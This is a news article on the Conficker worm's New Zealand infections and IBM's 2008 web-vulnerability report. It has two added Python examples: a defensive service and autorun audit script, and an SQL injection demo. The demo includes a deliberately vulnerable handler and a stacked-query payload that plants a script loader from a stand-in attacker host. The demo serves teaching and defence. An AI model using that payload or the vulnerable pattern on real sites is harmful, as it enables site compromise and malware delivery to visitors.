IBM is tracking the spread of the Conficker worm globally and has identified 1,156 instances of infection here in New Zealand as of January 29.
Conficker, also known as Downadup, has spread rapidly around the globe, causing havoc on corporate networks including that of the New Zealand Ministry of Health.
The worm has spread especially fiercely in South America and Asia, but according to IBM’s statistics, New Zealand also appears to have been relatively hard hit on a per capita measure.
IBM’s New Zealand security expert John Martin says the infection here has been “quite significant”.
Downadup uses computer or network resources to make copies of itself. It may also include code or other malware that damages a computer or the network. Once executed, Downadup disables some system services, including Windows Automatic Update, Windows Security Centre, Windows Defender, and Windows Error Reporting. The worm then connects to a malicious server, where it downloads additional malware to install on the infected computer.
Martin says most of the local infections appear to have been in small organisations and small businesses. He says a lot of the blame for these infections lies with users who turn automatic Windows updates off.
Martin says Conficker is now in its second phase, spreading by USB devices, network shares and cracking passwords.
Worryingly, nobody actually knows what the payload, or purpose, of Conficker is, Martin says. IBM’s X-Force security threat analysis service, however, believes it is most likely to be used as a botnet, a network of zombie computers receiving orders from a controller.
Even organisations that have applied patches can still be vulnerable to the worm through USB infection, Martin warns. He recommends systems administrators disable the autorun feature on all such memory sticks.
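The two host-level symptoms described above (the worm switching off Automatic Updates, Security Centre, Defender and Error Reporting, and autorun on removable media remaining enabled on patched machines) can be checked with a small triage script. The following Python is an added example, not code from IBM or from the article: it parses `sc query` / `sc qc` output for the watched services and evaluates the `NoDriveTypeAutoRun` policy bitmask. The service names (`wuauserv`, `wscsvc`, `WinDefend`, `ERSvc`), the registry path and the sample `sc.exe` output are assumptions of the example; on a non-Windows host only the constructed sample is evaluated.

```python
import subprocess
import sys

# Service names assumed to back the components the article says the worm
# disables (Automatic Updates, Security Center, Windows Defender, Error
# Reporting). They are the usual XP/Vista-era names but are an assumption here.
WATCHED_SERVICES = {
    "wuauserv": "Automatic Updates",
    "wscsvc": "Security Center",
    "WinDefend": "Windows Defender",
    "ERSvc": "Error Reporting Service",
}

# Bits of the NoDriveTypeAutoRun policy value (one bit per drive type).
DRIVE_REMOVABLE = 0x04
DRIVE_FIXED = 0x08      # some USB sticks enumerate as fixed disks, so check both
ALL_DRIVES = 0xFF       # the value that disables autorun for every drive type
POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"


def sc_field(text, field):
    """Pull the last token of a 'FIELD : n  WORD' line from sc.exe output."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == field and parts[1] == ":":
            return parts[-1]
    return None


def audit_services(sc_output):
    """sc_output: {service: (sc query text, sc qc text)}.
    Returns the services that are not both running and set to auto-start,
    which is the footprint the worm leaves on the services listed above."""
    findings = {}
    for name, (query_txt, qc_txt) in sc_output.items():
        state = sc_field(query_txt, "STATE")
        start = sc_field(qc_txt, "START_TYPE")
        if state != "RUNNING" or start != "AUTO_START":
            findings[name] = (state, start)
    return findings


def autorun_blocked(mask):
    """True when the policy mask disables autorun on removable and fixed
    drives. None (value absent) means the policy is not set at all."""
    if mask is None:
        return False
    wanted = DRIVE_REMOVABLE | DRIVE_FIXED
    return (mask & wanted) == wanted


def live_audit():
    """Query the real machine. Only meaningful on Windows; elsewhere returns None."""
    if sys.platform != "win32":
        return None
    import winreg  # Windows-only module

    def sc(*args):
        return subprocess.run(["sc", *args], capture_output=True, text=True).stdout

    outputs = {n: (sc("query", n), sc("qc", n)) for n in WATCHED_SERVICES}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY) as key:
            mask = winreg.QueryValueEx(key, "NoDriveTypeAutoRun")[0]
    except OSError:
        mask = None
    return audit_services(outputs), autorun_blocked(mask)


# Constructed sc.exe output for a host where two of the watched services have
# been stopped and disabled; the layout follows what sc.exe prints on English Windows.
SAMPLE_SC_OUTPUT = {
    "wuauserv": ("SERVICE_NAME: wuauserv\n        STATE              : 1  STOPPED\n",
                 "SERVICE_NAME: wuauserv\n        START_TYPE         : 4   DISABLED\n"),
    "wscsvc": ("SERVICE_NAME: wscsvc\n        STATE              : 1  STOPPED\n",
               "SERVICE_NAME: wscsvc\n        START_TYPE         : 4   DISABLED\n"),
    "WinDefend": ("SERVICE_NAME: WinDefend\n        STATE              : 4  RUNNING\n",
                  "SERVICE_NAME: WinDefend\n        START_TYPE         : 2   AUTO_START\n"),
    "ERSvc": ("SERVICE_NAME: ERSvc\n        STATE              : 4  RUNNING\n",
              "SERVICE_NAME: ERSvc\n        START_TYPE         : 2   AUTO_START\n"),
}

if __name__ == "__main__":
    print("sample host findings:", audit_services(SAMPLE_SC_OUTPUT))
    print("autorun blocked with 0xFF:", autorun_blocked(0xFF))
    print("autorun blocked with 0x91:", autorun_blocked(0x91))
    print("live audit:", live_audit())
```

Setting `NoDriveTypeAutoRun` to `0xFF` is the usual way to disable autorun for every drive type; a value that leaves the removable bit clear (such as `0x91`) still lets a memory stick trigger it. On older Windows versions the policy was not fully honoured for `autorun.inf` until the relevant Microsoft update was applied, so the registry value alone is not proof that the vector is closed.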
At the beginning of February, IBM released the results of its 2008 X-Force security trend statistics report. The report found that web application vulnerabilities have hit an all-time high. Hackers have refined the means to compromise the security of corporate websites, and are using these to launch cyber-attacks against visitors to corporate websites, the report says.
Last year more than half of all vulnerabilities disclosed were related to web applications, and of these, more than 74% had no patch. Vulnerable applications included many of the open-source content management systems used by corporations on their websites.
The report says hackers are attacking these vulnerabilities with massive waves of automated SQL injection attacks, where SQL code is “injected” via vulnerabilities into back-end databases, usually through search boxes or website forms.
The injected code is stored in the database and served back as part of the site's pages, where it redirects visitors to malicious websites that download malware onto their machines. The volume of SQL injection attacks at the end of 2008 was 30 times that of the previous summer, IBM says.
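The mechanism described above, as an added example that is not part of the IBM report or the article: a contact-form handler that splices user input into its SQL runs an attacker's second statement, which appends a remote script loader to every stored page body, so the site itself starts sending visitors to the attacker's server. The same input passed through a bound parameter is stored as plain text. The example uses Python's `sqlite3`; the vulnerable handler calls `executescript()` to mimic a database driver that accepts stacked statements, as the attacked Microsoft SQL Server back ends did. The table layout, the sample pages and the `malicious.example` host are constructed for the demonstration.

```python
import sqlite3

# Constructed sample content for a small corporate site: public pages and a
# table that a "contact us" form writes into.
PAGES = [
    (1, "About us", "<p>We make widgets.</p>"),
    (2, "Contact", "<p>Email sales@example.com</p>"),
]

# Constructed attacker payload. It closes the quoted value and the INSERT's
# parenthesis, appends a second statement that tags every page body with a
# remote script loader, and comments out the rest of the original query.
# The host name is a placeholder, not a real attack domain.
INJECTED_SCRIPT = '<script src="http://malicious.example/x.js"></script>'
PAYLOAD = "hello'); UPDATE pages SET body = body || '" + INJECTED_SCRIPT + "'; --"


def new_site_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", PAGES)
    conn.commit()
    return conn


def submit_message_vulnerable(conn, message):
    """Form handler that splices the submitted text into the SQL string.
    executescript() runs every statement in the string, mimicking a driver
    that accepts stacked queries, so the attacker's UPDATE runs as well."""
    sql = "INSERT INTO messages (body) VALUES ('" + message + "')"
    conn.executescript(sql)


def submit_message_safe(conn, message):
    """Same handler with a bound parameter: the text reaches the database as
    data, so its quotes and semicolons never reach the SQL parser."""
    conn.execute("INSERT INTO messages (body) VALUES (?)", (message,))
    conn.commit()


def tainted_pages(conn):
    """Titles of pages whose stored body now carries the injected loader."""
    rows = conn.execute("SELECT title FROM pages WHERE body LIKE ?",
                        ("%" + INJECTED_SCRIPT + "%",)).fetchall()
    return [r[0] for r in rows]


def stored_messages(conn):
    return [r[0] for r in conn.execute("SELECT body FROM messages ORDER BY id").fetchall()]


def demo():
    """Run the same payload through both handlers and report the outcome."""
    vuln = new_site_db()
    submit_message_vulnerable(vuln, PAYLOAD)
    safe = new_site_db()
    submit_message_safe(safe, PAYLOAD)
    return {
        "vulnerable_tainted": tainted_pages(vuln),   # every page now loads x.js
        "vulnerable_stored": stored_messages(vuln),  # only "hello" was stored
        "safe_tainted": tainted_pages(safe),         # pages untouched
        "safe_stored": stored_messages(safe),        # payload kept as plain text
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The `LIKE '%...%'` search in `tainted_pages` doubles as a simple detection query for the aftermath: a site that has been hit will have the loader tag present in many text columns at once, which is the signature of the automated waves rather than a single-page defacement.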